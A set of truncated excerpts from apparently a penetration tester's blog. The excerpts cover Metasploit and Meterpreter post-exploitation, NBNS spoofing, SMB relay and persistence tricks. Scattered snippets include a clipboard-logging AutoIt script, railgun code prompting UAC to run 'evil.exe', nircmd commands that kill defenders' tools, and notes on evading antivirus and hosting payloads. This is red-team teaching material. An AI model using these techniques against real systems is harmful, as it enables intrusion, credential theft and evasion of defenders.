Now, don’t get me wrong, I love WCE, and Hernan Ochoa does an amazing job with it, but when it comes down to it, it’s the best tool for the job.

So it turns out that Windows Firewall talks IP addresses just like any other firewall, so if you configure FakeNetBIOSNS to tell everyone that the IP address for whatever they looked up is YOUR IP, guess what, no need to bypass the spoof filters ;-) Happy Rob!
$ cat nbns.ini
PROJECTMENTOR WPAD 172.16.10.207
PROJECTMENTOR FILESHARE 173.26.10.207
Results in:
Game ON!

One of pen testers’ favorite attacks is NBNS spoofing. Now Wesley, who I originally learned this attack from, traced this back to sid (http://www.notsosecure.com/folder2/2007/03/14/abusing-tcpip-name-resolution-in-windows-to-carry-out-phishing-attacks/). Wesley’s stuff can be found here: http://www.mcgrewsecurity.com/tools/nbnspoof/
Wesley’s stuff eventually led to this awesome post on the Packetstan blog: http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
and in that post the Metasploit module to do it all is demoed. But therein lies the rub. With each degree of separation we have more and more solidified it into an “on-site” only attack.

Watching Egypt’s talk at DEFCON 20 he mentioned the ability to jump onto a system when pageant (PuTTY’s ssh-agent equivalent) is running. So I wanted to figure out the best way to get this going. Here is what I came up with:
meterpreter > run enum_putty
[*] Putty Installed for [["Administrator"]]
[*] Saved SSH Server Public Keys:
[*] rsa2@22:172.16.10.150
[*] Session corp_webserver:
[*] Protocol: SSH
[*] Hostname: 172.16.10.150
[*] Username: root
[*] Public Key:
meterpreter >
Awesome, this guy runs as root and we have the IP address.

In the previous post: http://www.room362.com/blog/2012/8/11/let-me-out-of-your-net-workndashintro.html I told you about letmeoutofyour.net, but how does it work?
Things we need to accomplish on the server:
Listen on all ports
Answer for all hostnames and subdomains
Answer for all HTTP verbs, file and folder requests
ONE: Listen on all ports
(I used Linux, so this guide is for such, modifications to other OSs is up to the reader)
First you have to get rid of all other services.

Something that is often useful is a known-good. Something out of the control of your adversary or outside modifiers. But back to that in a sec, egress ‘busting’ or getting your payload/backdoor/trojan/c2 out of someone’s network once you’ve gotten that ever elusive “CODE EXECUTION HAPPY DANCE” going on isn’t always easy. There is even a Metasploit payload for it called ‘allports’:
https://community.rapid7.com/community/metasploit/blog/2009/09/24/forcing-payloads-through-restrictive-firewalls
There is also ‘Egress Buster’ by the guys over at TrustedSec which can do 1000 ports in just a few seconds:

Egypt and I have decided to give away a spot in our training event at DerbyCon. This won’t come easy though, you have to submit an essay to us with one of the following topics:
Essay Topic Options:
1. Why I deserve a free training class
2. How I would social engineer Egypt and Mubix out of a ticket to their class
Maximum Length: ~1000 words / 3 pages. (We’re lazy)

With the use of Mimikatz and WCE, clear text passwords are much more common. What isn’t always there is the user. They take lunches, go home at a reasonable time and generally aren’t really appreciative of our (pentester/red teamer) schedule.
A straightforward way, provided by Microsoft, to create a process as a user (thereby having their token readily available) is using ‘runas.exe’:
w00t, now that the user is present, we can migrate our meterpreter session into that notepad and we’re good, right?

Every so often someone writes a Metasploit Module that is pretty epic. Today is one such day:
Twitter Link: https://twitter.com/webstersprodigy/status/222529916783169536
Which has a link to here: https://github.com/rapid7/metasploit-framework/pull/589
Demo / Example resource files: https://skydrive.live.com/?cid=19794fac33285fd5&resid=19794FAC33285FD5!170&id=19794FAC33285FD5%21170
You can pull the fork w/ branch from here: https://github.com/webstersprodigy/metasploit-framework/tree/module-http-ntlmrelay
And as soon as you do you can start doing this (using the example resource file to put a file, cat it out, enum shares available, list files on a share, then psexec all from a single URL being loaded):

@jabjorkhaug posed the following question on Twitter today:
I figured I could solve this and it would be an interesting challenge. Here is what it gets detected as:
The service binary that is used as part of PSEXEC is located here:
MSF Directory/data/templates/src/pe/exe/service/service.c
The important part to look at starts at line 57:
#define WIN32_LEAN_AND_MEAN
#include <windows.h>

#define PAYLOAD_SIZE 8192

char cServiceName[32] = "SERVICENAME";
char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";

SERVICE_STATUS ss;
SERVICE_STATUS_HANDLE hStatus = NULL;

/*
 *
 */
BOOL ServiceHandler( DWORD dwControl )
{
	if( dwControl == SERVICE_CONTROL_STOP || dwControl == SERVICE_CONTROL_SHUTDOWN )
	{
		ss.

Everyone does things differently, and explaining what goes through an attacker’s head when they get a shell is virtually impossible, and even more so to generalize into a methodology, but I’ve tried to do that with the “3 ‘P’s of Post Exploitation”. They are in a certain order for a reason, but which order is best is certainly up to circumstance.
The first P is Presence. It is first because the attacker needs to get a sense of what he/she has got before they move on.

Submitted it to MSF via pull request here: https://github.com/rapid7/metasploit-framework/pull/538
Added to trunk: https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/tcpnetstat.rb
I promised this one a while ago, sorry for the delay. This only does TCP; it’d be trivial to do UDP as well, but I never really found anything interesting and actively going on on the UDP side. It’s real simple, first we’ve gotta add the GetTcpTable function to railgun:
session.railgun.add_function('iphlpapi', 'GetTcpTable', 'DWORD', [
  ['PBLOB', 'pTcpTable', 'out'],
  ['PDWORD', 'pdwSize', 'inout'],
  ['BOOL', 'bOrder', 'in']
])
Then gauge the size of the table:

Was messing with the Windows service binaries in Metasploit today and I noticed something unique I hadn’t noticed before. For the PSEXEC module, the service name (actually just the display name, ‘service name’ is random) always started with an uppercase ’M’.
Curious as to why that was, I looked and found Line 246 of the PSEXEC module to be the culprit:
I can guess why the M is there. Might be just a quirk with old Windows versions that didn’t allow lowercase service names, not sure.

Penetration Testing / Red Teaming requires the use of a lot of tools. I don’t mind getting called a “script kiddie” because I can accomplish more and faster when I don’t have to code every single task I need to do. This post is to point out companies that make this possible and give a small bit of thanks.
(If you’ve ever tried to convince a company to give something away for free, you can understand how big this really is) Some give a lot, some only one tool, but even one is more than some.

One of the powers of Metasploit is its ability to stay memory resident, through the use of reflective DLL injection even keeping new functionality the attacker loads from ever touching disk. Well, the first thing I wanted to do with Mimikatz is get to that same level.
Here is my first step to that end; a railgun based Meterpreter script. Now before going all reflective with it I needed to understand how the DLL worked.

I found a number of things interesting when reading the following post:
http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
Too bad that nmap’s interactive mode was taken out, but there are a great number of other such methods, most notably VI’s shell mode. But when I started looking into appending or inserting lines into /etc/sudoers for CCDC, I happened upon an interesting function of that file. Near the end of the file there are two lines:

If you have never heard of PhantomJS ( http://phantomjs.org/ ) before, it’s a “Full Web Stack with No Browser Required”; basically it’s a GUI-less browser. One of the magical “example” files that it has is called “rasterize.js”
Rasterize.JS essentially renders a URL, screenshots it and gives it to you in a number of different formats. Here’s its usage:
Usage: rasterize.js URL filename [paperwidth*paperheight|paperformat]
  paper (pdf output) examples: "5in*7.5in", "10cm*20cm", "A4", "Letter"
PhantomJS is sweet for sweeping a ton of IPs and suspected HTTP/S sites, and looking through a gallery of them to start figuring out which looks the most interesting… and we are going to do essentially just that, except from a Victim machine.

At CCDC, Sticky Keys via RDP was a very successful re-entry point for the Red Team. You can read more about how this works here:
http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html
So if you can get physical access or SYSTEM/Admin access at some point and enable + reach RDP, you can very easily follow those instructions and gain a level of persistence without the need of a pesky password :-)
However, this doesn’t work so well with the advent of NLA or Network-Level-Authentication, which was enabled for Vista systems and beyond.

@egypt and I have teamed up this year to teach at DerbyCon at the end of September. Here is the very basic outline of the class and subject to change:
(Sign up here: https://www.derbycon.com/training-courses/ )
THURSDAY
Intro to the Framework
The history of the Framework
Ninja Demo
Usage
Recon
Exploitation
Pillaging
Post modules
Intro to Ruby
Getting your environment set up
Ruby Basics
Strings, Arrays, and Methods oh my
IRB, Pry - The No-Spoon Portion
Navigating Documentation
Module Writing
Auxiliary Modules
Exploit Modules
Post Modules
Railgun (Windows and ?

A friend of mine is presenting at phDays in Moscow at the end of May. If you are in the area, or can be, I would highly recommend you attend, and in particular his talk.
His blog is here: http://blog.gentilkiwi.com/
And since a picture is worth a thousand words:
You should really go check out what he is going to present… just sayin’

Since this is a constantly updating slide deck I figured I’d post it here so I didn’t have to keep emailing it out. ;-) If you have comments or if something is wrong grammatically, technically or in any other way I’d love input. Suggestions also welcome.
Here is a link straight to the doc if you want to comment or add it to your google docs list: https://docs.google.com/presentation/d/1pPXLg3KqwSMLRCNRfows5QnVI2mLjSmll5vN2WHMFJg/edit

I have been using the LNK trick I talked about in my last post for a while, but always needed a Windows machine to create the LNK file. When I decided to write a post about it, I wanted to put the stipulation on myself that I would finally develop a way to get it done without having to lug around a VM or spin one up every time I needed to change its target.

*TL;DR:* SMB Relay + LNK UNC icons = internal pentest pwnage
I need to touch on the highlights of two vulnerabilities before we talk about the fun stuff, but I highly encourage you to read the references at the bottom of this post and understand the vulnerabilities after you are done with my little trick, as you might find one of your own.
MS08_068: http://www.cvedetails.com/cve/CVE-2008-4037/
In 2008, Microsoft released MS08_068 which patched the “SMB Relay” attack.

This is my talk that I gave at ShmooCon 2012. It was a great honor to be given the chance to speak at ShmooCon, as it has been my second home since 2006 (missed the first one… haven’t missed one since)
A @textfiles approach to gathering the world's DNS from Rob Fuller

A number of times during tests I’ve actually run into those mythical creatures called “patched Windows machines”. At DerbyCon Chris Gates and I released the “Ask” post module (which I had failed to publish). This module very simply uses the ShellExecute Windows function via Railgun with the undocumented (but very well known) operator of ‘runas’. These two lines accomplished that:
client.railgun.add_function('shell32', 'ShellExecuteA', 'DWORD', [
  ["DWORD","hwnd","in"],
  ["PCHAR","lpOperation","in"],
  ["PCHAR","lpFile","in"],
  ["PCHAR","lpParameters","in"],
  ["PCHAR","lpDirectory","in"],
  ["DWORD","nShowCmd","in"],
])
client.railgun.shell32.ShellExecuteA(nil,"runas","evil.exe",nil,nil,5)
This would quite simply prompt the user with that annoying UAC prompt asking the user to run ‘evil.

Since it’s Christmas and all, I thought I’d post the code snippet from my Hak5 segment a bit early:
#include <Clipboard.au3>
#include <File.au3>

$oldclip = ""
While 1
    $clip = _ClipBoard_GetData()
    If $clip <> "0" Then
        If $clip <> $oldclip Then
            _FileWriteLog(@UserProfileDir & "\clip.log", $clip)
            $oldclip = $clip
        EndIf
    EndIf
    Sleep(100)
WEnd
It’s pretty straightforward, and I welcome everyone to install AutoIt3 and compile/run the above script to see what it does (although most of you I’m sure can figure it out just by reading it).

When Google Reader decided to remove everything it was good for, we all scrambled to find new homes for things we wanted to share. Tumblr became the place that most of us flocked to. I’ve found Tumblr to be not a very good substitute for Google Reader’s functionality (IMHO).
The other day, carnal0wnage told me about a service called ‘Buffer’, and all this thing does is do scheduled tweets, but it has one distinct feature, not only is it focused around the sharing of links, it works (if you install the browser plugin/extension) INSIDE OF GOOGLE READER ;-) So you can be reading a feed item, push a button and not have to open a page or another app, it’s pretty much all right there.

Pentest Monkey is a great resource for a lot of things. One of which is this:
John The Ripper Hash Formats | pentestmonkey
I used it, plus a bit of bash fu to try to figure out some hashes that I was trying to crack.
Step 1: Create file of supported hash types. For me, that was simple I just threw the following in ‘supported_types.txt’ in the same directory as john.

This Christmas I’ve decided to spread a little cheer (aka free stuff) ;-) , and I’m doing it in 2600 fashion. Now, I don’t know if I have enough readers to pull this off, but here goes:
I will be sending 1 No Starch book of the winner’s choice each day for 12 days starting on December 1st. Here’s the catch. To win the books you must submit a picture of a door or room that is unmistakably ‘Room 362’.

Jcran recently blogged about an easy way to run a post module on all sessions:
http://blog.pentestify.com/simple-framework-domain-token-scanner
msf> use post/windows/gather/enum_domain_tokens
msf enum_domain_tokens> irb
framework.sessions.each do |session|
  run_single("set SESSION #{session.first}")
  run_single("run")
  sleep 1
end
You use the POST module, drop to IRB and run those 4 lines, and bam, you win. With resource files we can automate this a bit more and have it so that we do this effortlessly with any post module.

In @carnal0wnage and my presentation at DerbyCon 2011 we talked about using SCREEN and SCRIPT to keep connections live / use them across SSH sessions, and log everything that happens. What we didn’t cover is the fact that there isn’t a time stamp for those logs. Now, Metasploit has multiple ways of creating logs:
cat ~/.msf4/logs/framework.log
This log automatically logs all of the error data, which is great for troubleshooting when something isn’t working, but doesn’t record what you are doing inside of msfconsole.
msf> spool ~/myclient.

On Vista and above there is a Windows ‘Redirector’ (a redirector is basically a symlink or fake directory that’s there but not in Windows) that allows a 32bit process to create a 64bit one. For anyone who has tried to run ‘execute -H -c -f notepad.exe’, they know that if they are in a 32bit process, they get a 32bit notepad even if they are on a 64bit system, which is annoying.

Chris Gates (@carnal0wnage) and I will be speaking at DerbyCon next week:
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
“This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix. “

Say you go for the 500+ shells on an internal test or your phishing exercise goes way better than you thought. Well, you need to get your bearings quickly, and going into each shell and doing a ps, then looking through the list for all the users logged in, is a bit of a pain and definitely not ideal.
I wrote a quick script that you can throw in the meterpreter scripts folder to aid you a bit with this:

This doesn’t really apply to Windows users, as you can just close PuTTY. But for everyone else, stalled SSH sessions suck. You are either slamming enter to get it to realize it’s been disconnected or just waiting for it to. Well, for those of us who are impatient, just hit:
~.
That’s right, SHIFT + the key above TAB, release, and hit the period. You may have to hit ENTER first to clear the buffer or whatever it does, but do that and it will disconnect the SSH session right away.

John the Ripper only takes one word list at a time. There are plenty of docs out there that show you how to cat all of your dictionaries into John’s stdin function, but I like to run rules against my lists and I didn’t see any how-tos on doing this. Here is my way:
ls dicts | xargs -t -I file ./john --pot=victim.pot --format=mscash --wordlist=dicts/file --rules victim_cachedump.txt
This command will ls the ‘dicts’ directory and pipe it to xargs, which will spit out the command it uses for each iteration (-t) and replace every time it sees the word file with the line/iteration it’s on (-I).

I’ve had a private list of commands that I run on Windows or Linux when I pop a shell, as I’m sure most pentesters do. It isn’t so much a thing of hoarding as much it is just jumbled notes that are ‘not worth posting’
Well, I made two (now 3) public google docs (anyone can edit) *don’t be a dick clause
Linux/Unix/BSD Post Exploitation: https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US
Windows Post Exploitation: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US

I am way late to the game on this, but if you have a blog, a twitter handle, or even better (in this specific case) a CISSP, please support Wim Remes (@wimremes), as he has submitted to become a member of the (ISC)2 Board of Directors.
On twitter use the hashtag: #wim4board
Let’s help the certifications, especially the one with so much corporate/gov acceptance, get better.
His petition: http://blog.remes-it.be/petition.html
Other supporters:

Update 1: No this doesn’t need to be in memory since you control the system but it was a fun challenge
Update 2: The info from the ‘adduser’ payload says ‘Create a new user and add them to local administration group’ - I’m guessing since I ran this on a DC is why I didn’t notice this but it is something to keep in mind when running this script.
Update 3: Here is a powershell way of doing things from a CSV, you can do some passwords in the CSV and keep it for reference too.

I saw a post back in June and it just recently came up again:
http://www.securityartwork.es/2011/06/01/dns-port-forwarding-con-meterpreter/
It looked like a lot of hard work to set that up and I’m really lazy. I didn’t want to have to go through all that every time I got onto a new network. So, I made a very simple meterpreter post module to just call a Windows API function called ‘gethostbyaddr’ using Railgun.
TL;DR: You can download the post module here: ipresolver.

One important thing to note about Railgun is that you are querying the API, and just as if you were using C++, the API you are calling just might not be there on the system you are trying to call it on. So here is a quick trick to find out if the function (API) that you are trying to call is available to you:
For my example I’m using ‘getaddrinfo’ since its life in Windows is somewhat odd.

Also known as “How to practice what we preach”. I don’t know how long I’ve been telling clients that they need to have a minimum password length of 15 characters to make it so there is no chance LM will be stored (and a cursory bonus that their password won’t be close to their original). But I’ve never tried setting it myself. Well, a client called me out. You can’t! (well at least not through the UI )

This series was interrupted a bit by the new Metasploit HTTP/HTTPS payloads (more info). Definitely not complaining though as the new features *(as will be discussed in part 2) are some epic new additions to the payloads list. However an important change happened while the craziness over the new payloads was going on. ScriptJunkie snuck in an awesome change to msfvenom (a.k.a. msffsm).
Here is the link to the ticket about the change (link) and the revision (r13057)

I’ve been cracking passwords for a while and use a myriad of tools in a certain order to get the job done. I find that Cain is still my go-to for allowing me to visualize the process and do some basic sorting (really wish I could search in-app). But I’ve been asking around on twitter some questions like why GPU cracking for 50k hashes is faster than Rainbow Tables (most say the bottleneck is the HDD read style and speed), and many asked what all of my complaints are, so I figured this would be the best place (vice multiple emails)

I missed the 3 year anniversary of NoVA Hackers but I did want to make a post about it since we are still going strong and are now at ~150 active members.
Chris Gates and I started this thing together back in October of 2008, which spawned off of Chris’ idea to start an AHA (Austin Hackers Association)-like group in NoVA. Its ideals merged with the already going NoVA Security Luncheons that I was throwing in Reston VA, and DC was where it all started.

Nick Harbour wrote a post on Mandiant’s blog about some malware that was using a DLL called ‘fxsst.dll’ to hide and stay persistent on a system. The DLL is used by Windows when it is acting as a Fax server (anyone still do that?). He mentions some very interesting points:
The DLL gets loaded at login by Explorer
The DLL exists in System32 but is looked for in Windows first
Explorer doesn’t try to use anything inside of it via exports unless the system is acting as a fax server (aka safe to put a pretty bland DLL there)
I thought… no it couldn’t be that simple… let’s see:

In Part 1 I gave an example I used at CCDC with the single ‘windows/download_exec’. One of the down sides of that payload is you need to host the binary, giving up an IP/host that can be blocked. Well, Google recently (a couple months ago) allowed people to upload ‘anything’ to Google docs. And you can then share these files publicly. Probably already see where I’m going with this, but here are some steps to get it going, first upload your malicious binary (not the dropper ‘windows/download_exec’, but the file it needs to execute).

Payload selection is something that rarely gets talked about in detail. Most PoCs just use calc.exe, netcat, or some kind of socket. The vast majority of Metasploit tutorials, videos and documentation use the _windows/meterpreter/reverse_tcp_ payload which is only one of 224 possible payloads. Here is a little disclaimer: While the payloads in Metasploit don’t get updated as much as other parts of Metasploit, this is a point in time documentation of them (June 23, 2011) and the payloads available in Metasploit are constantly changing.

Just a follow up to my previous post. One of the things that sets that method apart is the fact that the suspension (once the DLL injection occurs) comes from within the process, and it suspends all the child processes as well.
Another way you can do this without the injection is just sending a suspend to all the threads in the process.
pid = 2980
targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
targetprocess.

Recently Didier Stevens wrote ‘Suspender.dll’, which is a DLL that will suspend a process and all of its child processes after a delay. 60 seconds is its default, but you can rename the DLL to add a number (as such ‘Suspender10.dll’ for 10 seconds) to make the delay whatever you wish. You can find the blog post and download here: http://blog.didierstevens.com/2011/04/27/suspender-dll/
Jonathan Cran and I had the same idea, as I’m sure many others did as well.

When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the “The parameter is incorrect” error in meterpreter. So I’ve had to fall back on dropping binaries which I really don’t like doing because of the added clean up and chance of getting ‘caught’. Well, with a bit of migration you’ll be back to passing the hash. Here is how, with a bit of the thought process first:

Original Post: http://blog.nvisiumsecurity.com/2011/04/exploitable-mobile-app-challenge-now.html
You can read the details on the above link, but it boils down to you make an application for iPhone or Android. You make it vulnerable to X,Y,Z types of flaws, you win a 32gb iPad or a Motorola Xoom.
Added bonus, all the apps get submitted to OWASP for people to learn Mobile security.

Chris Gates wrote a blog post about the ‘getvncpw’ meterpreter script. I ran into the same issue on Penetration Tests in the past but didn’t know much about the wacked out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn’t get a chance to.

One of the best ways to throw blue teamers off the scent of another host getting owned, which also has the added effect of stressing them out is a batch script that runs through some of the more annoying features in nircmd.exe in succession and at regular intervals:
http://www.nirsoft.net/utils/nircmd.html
setdisplay 640x480
killprocess taskmgr.exe
killprocess procexp.exe
win -style title "my computer" 0x00c00000
win child title "my computer" +exstyle all 0x00400000
win +exstyle title "my computer" 0x00400000
win trans ititle "internet explorer" 256
win close class "CabinetWClass"
multiremote copy "c:tempcomputers.

Not sure how far back it goes (Win95?) but 2000, XP and all the way up to Win 7 have a program called DOSKEY:
C:\Users\vmadmin>doskey /?
Edits command lines, recalls Windows commands, and creates macros.

DOSKEY [/REINSTALL] [/LISTSIZE=size] [/MACROS[:ALL | :exename]]
  [/HISTORY] [/INSERT | /OVERSTRIKE] [/EXENAME=exename] [/MACROFILE=filename]
  [macroname=[text]]

  /REINSTALL      Installs a new copy of Doskey.
  /LISTSIZE=size  Sets size of command history buffer.
  /MACROS         Displays all Doskey macros.
  /MACROS:ALL     Displays all Doskey macros for all executables which have
                  Doskey macros.

Constant connections and odd binaries running on systems usually get caught pretty quickly in CCDC events. However, NFS exports are hardly ever noticed. Setting it up on an Ubuntu/Debian box is a snap, and given the right directory and permissions it can lead you right back to getting shell any time you want without a constant connection. Plus, NFS blends right in and can listen on TCP and/or UDP (2049).
Here is a quick how-to on setting up NFS:

(No I’m not old enough to have used that term when it was the standard)
I believe that this tweet should be archived for reference:
http://twitter.com/#!/_ming_se/status/37688231185219584
And for those who don’t get the reference, here is a Pontiac Fiero:

The following are good adds to your DNS brute force list:
These are all SRV records, so make sure your query type is set correctly. The great thing about SRV records is that the answer tells you the port as well. Isn’t that nice of them?
I don’t know of any DNS tools that use SRV records as part of their process, but scripting dig to do so isn’t tough.
_autodiscover._tcp
_caldav._tcp
_client.

In this day and age everyone is worried about the insider threat. Internal Penetration Testing doesn’t really test what would happen if your janitor got paid 50 bucks to put a USB stick in one of your servers. External Penetration Tests are never scoped for that sort of testing. So what is a company to do? How can they know what the risk is? The answer? Usually they guess or assume. Mostly because they are scared to find out, it’s happened to them before, or one of a million different justifications.

[UPDATE] This module (enum_delicious) has been pulled from Metasploit since Delicious no longer allows searching by site.
In the last post I showed off how Archive.org’s Wayback Machine can be used to pull URLs for a domain. Another place where URLs are stored and can be searched by domain is Delicious.com (a bookmarking service). I’ve seen people bookmark everything from internal web portals to URLs with special no-auth passwords in them.

Archive.org allows you to check the history of sites and pages, but a service most are not aware of is one that gives you a list of every page that Archive.org has for a given domain. This is great for enumerating web applications; many times you’ll find parts of web apps that have been long forgotten (and usually vulnerable).
This module doesn’t make any requests to the targeted domain; it simply outputs a list, to the screen or to a file, of all the pages it has found on Archive.org.

Most malicious IP lists focus on the client-side threat, where servers (hosted or exploited) host client-side exploits or evil scripting.
These don’t really help server admins very much. Project Honeypot does an amazing job of keeping detailed information on scanners, harvesters and brute forcers, the likes of which are the daily enemy of said admins. They offer a service called HTTP Block List or ‘HTTP:BL’.
Another way this list differs from the rest is it isn’t a list you can download.

This is definitely not my content, but I did want to highlight the talk Nicholas [1] gave at NoVA Hackers [2] this last November.
Nicholas B. gives a talk about SSH Patching for Offensive and Defense at NoVa Hackers November 2010
[1] http://twitter.com/nberthaume
[2] http://novahackers.blogspot.com/2010/10/november-meeting-monday-nov-15th-2010.html

Uninstallation is not new
Deleting and removing things on a box you own isn’t new
This method and how to do it remotely was posted in Feb 2007
But I didn’t know how to do it, and I thought it was hilarious, so I made a video:

“There is no stupid question” but, if it doesn’t meet this checklist, it’s officially a time wasting one.
Acceptable questions checklist:
1. Have I tried it
2. Have I checked the manual, wiki, or forum
3. Have I googled and searched for an answer
All marks must be achieved before a question is asked, unless the target of the question is getting paid to answer the source’s inquiries.
The “Have I tried it” mark can only be skipped in the case of life threatening actions.
PDF version is available upon request.

Revenge of the Bind Shell from Practical Exploitation on Vimeo.
BACKGROUND At the April 2010 NoVA Hackers meeting I discussed some of the offensive uses of IPv6 on current networks. Well, around that time Microsoft issued a patch to all of the supported versions of Windows that broke my methodology. Obviously I wasn’t the only one doing this ;-)
Before I get ahead of myself, let’s explain what Teredo is.

This is part one in a series of presentations I will be giving at the NoVAHackers meetings on forensics of all kinds as it can be leveraged in a penetration test.
Memory Forensics for Pentesters: Firefox from Rob Fuller

When you first step on a machine, you want to determine quickly whether you are just a user or an administrator. Meterpreter doesn’t have a way to quickly check this. You could drop to a shell, check the local “Administrators” group and your own user’s groups, and correlate any groups shared between the two outputs. You could run ‘getsystem’ and see whether any technique other than Kitrap0d works. You could also just run ‘ps’ and notice that you can see ‘SYSTEM’ processes.

Exploit modules inside of Metasploit don’t have the ability to run against multiple hosts with one swing of the bat. So I created some code to facilitate that. It’s really not much, but there are some really juicy pieces of knowledge I learned on the way.
// The following is a resource file, but instead of just giving you something to download or straight copy and paste, I’ve broken it up into sections.

Ask any developer and they will tell you that the age of a project is not calculated in calendar time, but in worker hours or “commits” to a project. The Metasploit Framework hit 10,000 today.
With the project dating back to 2003, well before the official “Revision 1” happened, there have been a lot of changes. Going from the initial incarnation as a network “game” written in Perl to the world’s largest Ruby project, the framework has seen its fair share of blood, sweat, and tears.

Back in 2009 the “ikee” rick-rolling worm went around the iPhone world via the password of ‘alpine’ on the root account. You are now warned to change your root password when you pop into Cydia and Rock the first time. But this thing just won’t stay down.
If you have jailbroken your iPad you might want to check out a little file called “master.passwd”. In it, there is another user called ‘mobile’ which has been pointed out since 2008 (here) on the iPhone as another account to change the password of.

Ever set up a multi/handler and get an odd IP hitting it? Probably forgot about it as internet chatter? Think again, you might have just been caught.
AV Tracker - http://avtracker.info/ is a site that tracks the different IP addresses, hostnames, computer names and user agents that AV and other “Submit-your-malware-here” drop boxes use.
Peter Kleissner and his team provide:
the ranges that the hosts use
a dynamic text file with the IP addresses listed, if you want to add it to some auto-updating block list
a line-by-line IPTABLES block config
and even C code to add into your binary to make sure it doesn’t talk out from one of those addresses (I could be reading it wrong, still a beginner in C)
The team has been criticized a lot by AV vendors, enough so that they took down the site in January of this year.

Metasploit’s Railgun is awesome, but getting things to work correctly can be a pain. Here are some of the resources that have helped me out:
System Error Codes - This is hands down the best resource you have; it will tell you what that stupid “5” or “1314” means in your return value. Keep this tab open to circumvent crazed bovine attacks.
theForger’s Win32 API Programming Tutorial - A really good place to start when you are getting to know the Windows API and the frustrations that come along with it.

Back on June 13th, “Patrick HVE” released RAILGUN:
http://mail.metasploit.com/pipermail/framework/2010-June/006382.html
And it was merged into the Metasploit trunk with revisions 9709, 9710, 9711 and 9712: http://www.metasploit.com/redmine/projects/framework/repository/revisions/9712
Basically what this allows you to do is make Windows API calls from Meterpreter without compiling your own DLL. It currently supports a number of Windows API DLLs:
iphlpapi, ws2_32, kernel32, ntdll, user32, advapi32 (You can find out exactly what functions are available by default in the api.

Certainly nothing to fuss over, but I’ve had a fascination with setting my target’s wallpaper as sort of a calling card for years now. I’ve been able to set the registry key (HKCU\Control Panel\Desktop\Wallpaper), but until recently I didn’t know how to get it to refresh so that it displayed without forcing the user to log out…
First, is the most important part, selection of the wallpaper. This is my first selection:

I was recently approached by savant, who told me that a bunch of my Twitpics had geo location in them. Larry Pesce from PaulDotCom has been doing research in this field for a while and each time he brings it up I casually checked a couple of my twitpics and came up empty handed.
But, he gave me exact references, so I went to Twitpic to check them out for myself.

*WARNING* if you use fgdump like I did, it extracts pwdump to %TEMP% at run time, which is detected by AV.
First of all, I was floored when this worked. Really AV? It’s that easy? Really?
So here is the breakdown: go get “Resource Hacker”… You’re almost done. Only 3 steps left (1 of which is optional).
I started with fgdump, a well known hashdumping/pwdump tool. It’s detected by 80% of all AVs and by all the top 10.

Normally I save links for my “Mubix Links” blog to keep the clutter down on this one, but I think this is one that I would like to highlight as important. The NFO, credits and summary to this copyrighted video is what I wish to highlight.
http://thepiratebay.org/torrent/5573874/HackersWanted%282008%29
I am against the misuse of copyrighted material, and it is a violation of laws in many countries, including my own.
I really wish this video would have been published, I’m sure it would have been a very interesting video, that I definitely would have purchased.

The other day Chris Gates posted an excellent blog post about the WebDAV hotness that Chris Sullo (author of Nikto) cooked up (DAVTest) which Ryan Linn popped out a Metasploit module for.
Anyways, the story left off being a very limited user called “Network Service”. This user has Read and Execute, but no Write access, and a very limited field of view to boot.
meterpreter > getuid
Server username: **NT AUTHORITY\NETWORK SERVICE**
Let’s look around a bit.

I have an admittedly limited view of the exploit dev world. However, from what I’ve seen devs have very few options: (Please correct me if I’m wrong)
Responsible Disclosure
Direct Contact => depending on the size of the vendor and their view on security, this could result in anything from a simple thanks, a reward, to a court hearing.
Exploit Broker => possibly sell, possibly not, depends on the broker.

Practical Exploitation is going to be me, explaining things the way that I see the world, on the best medium for what I’m explaining, be it a short blog blurb, a video of me, a video of a desktop, or just audio. There is no schedule that I’ll be sticking to, but I will guarantee you 3 things:
If you want it explained and it has to do with infosec or hacking (I’ll do my best on the hardware side), it will be on the show.

First of all, get Robert @RSnake Hansen’s RFI list here:
http://ha.ckers.org/blog/20100129/large-list-of-rfis-1000/
It’s a great list, but as soon as I saw it, I was like.. hmm.. how can I use that? Well, being that I am a Burp fan, I parsed the .dat with the following line:
cat rfi-locations.dat | grep -v "^#" | awk -F '?' '{print $1}' | sort -u > rsnake_list.txt
This pulls his list down to 906 entries, which you can load into Burp and hammer away with Intruder.

This is far from a new idea, however it’s not something that is easily provable. So I had an idea this morning. I posed the following question on Twitter:
You know what I got in return? A resounding “No” from everyone. (Well, I had one outlier, but who doesn’t when you are trying to apply science to prove art?) I challenge you to name another non-artistic career that people are so passionate about that they would stay in it even if they won the lottery.

I was recently on the grmn00bs podcast, I had a great time, and I can’t wait to see who they pick up next on their series:
grmn00bs podcast: episode 9
Update Archive.org Link
“When they were n00bs Series”
Show Notes:
hak5 is one of the original security shows. Rob has been featured on several segments.
Twit Netcast Network with Leo Laporte is another show that’s been around for a while.

If you hadn’t noticed, LinkedIn has started allowing you to link your Twitter account to your LinkedIn account. So, I didn’t know this (since I opted out), but apparently LinkedIn will kick your status updates to Twitter… like when you get a new job…
Privacy settings out the window! Woohoo for Web 2.0!

So yesterday (December 14th, 2009) HD Moore posted a tweet with a pic of the new VNC meterpreter script that he wrote:
Looking at the script I noticed that it created a new connection (two connections outbound). Well it was the perfect excuse to take the newly refurbished portfwd command for a spin.
https://github.com/mubix/stuff/blob/master/metasploit/vnc_oneport.rb
Or you can get it via the SVN at Revision 7872
By creating a bind payload instead of a reverse connect we can have the payload listen locally.

UPDATE: if you don’t make some additional steps, the ‘rvm 1.9.1’ command only is active for the current console session. See the site for details: http://rvm.beginrescueend.com/
